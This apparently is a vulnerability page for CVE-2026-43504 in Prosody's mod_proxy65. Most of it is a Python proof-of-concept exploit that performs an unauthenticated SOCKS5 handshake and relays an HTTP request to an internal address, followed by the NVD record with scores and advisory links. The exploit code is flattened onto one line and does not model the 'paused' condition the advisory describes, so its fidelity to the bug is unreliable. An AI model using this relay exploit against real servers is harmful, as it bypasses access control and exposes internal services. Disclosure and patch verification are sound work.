CVE-2026-43504

#!/usr/bin/env python3 # PoC for CVE-2026-43504: Prosody mod_proxy65 Unauthenticated Relay import socket import struct def connect_proxy(host, port): # SOCKS5 handshake (No Auth) # CONNECT command (0x01) to target try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) # Send SOCKS5 Greeting s.send(b"\x05\x01\x00") response = s.recv(2) if response != b"\x05\x00": print("[-] SOCKS5 handshake failed") return # Send CONNECT request to 127.0.0.1:80 (Example target) # ATYP: IPV4 (0x01), DST.ADDR: 127.0.0.1, DST.PORT: 80 req = b"\x05\x01\x00\x01" + socket.inet_aton("127.0.0.1") + struct.pack(">H", 80) s.send(req) resp = s.recv(10) if resp[0] == 0x05 and resp[1] == 0x00: print("[+] Connection relayed successfully (Access Control Bypass)") # Send dummy HTTP request s.send(b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n") print(s.recv(1024).decode()) else: print("[-] Connection rejected by proxy") s.close() except Exception as e: print(f"Error: {e}") if __name__ == "__main__": # Replace with target Prosody server IP and mod_proxy65 port target_host = "192.168.1.100" target_port = 5000 # Default mod_proxy65 port often varies, check config connect_proxy(target_host, target_port)

{"cve": {"id": "CVE-2026-43504", "sourceIdentifier": "[email protected]", "published": "2026-05-01T15:16:52.380", "lastModified": "2026-05-01T17:15:31.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Prosody before 0.12.6 and 1.0.0 through 13.0.0 before 13.0.5, when mod_proxy65 is enabled. Because mod_proxy65 mishandles access control in a paused scenario, relaying of unauthenticated traffic can occur."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:prosody:prosody:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.12.6", "matchCriteriaId": "B9387C8F-EE90-4F0C-9E40-BD3DAF571C74"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prosody:prosody:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.0.0", "versionEndExcluding": "13.0.5", "matchCriteriaId": "F946C4BE-7151-45DA-A376-D1B2DC449A5C"}]}]}], "references": [{"url": "https://prosody.im/security/advisory_735dd9d3/", "source": "[email protected]", "tags": ["Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/01/5", "source": "[email protected]", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}]}}